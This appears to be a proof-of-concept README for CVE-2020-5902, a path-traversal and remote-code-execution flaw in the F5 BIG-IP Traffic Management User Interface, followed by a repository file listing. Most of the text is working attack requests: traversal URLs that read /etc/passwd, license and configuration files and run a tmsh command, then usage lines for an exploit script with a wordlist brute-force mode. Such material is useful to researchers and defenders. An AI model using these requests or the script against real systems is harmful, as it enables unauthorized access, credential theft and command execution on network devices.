# CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
# Proof of concept
```
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
```
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
```
```
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
```
```
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
```
```
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
# Usage & Installation
```
git clone https://github.com/yasserjanah/CVE-2020-5902
```
```
cd CVE-2020-5902/
```
```
pip3 install -r requirements.txt
```
```
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
```
```
python3 exploit-CVE-2020-5902.py -ip <IP> -b
```
[4.0K] /data/pocs/986cb73ed7eaca7f7b8b970d62265efa49309d43
├── [5.4K] common_path.txt
├── [2.9K] exploit.py
├── [1.1K] README.md
└── [ 33] requirements.txt
0 directories, 4 files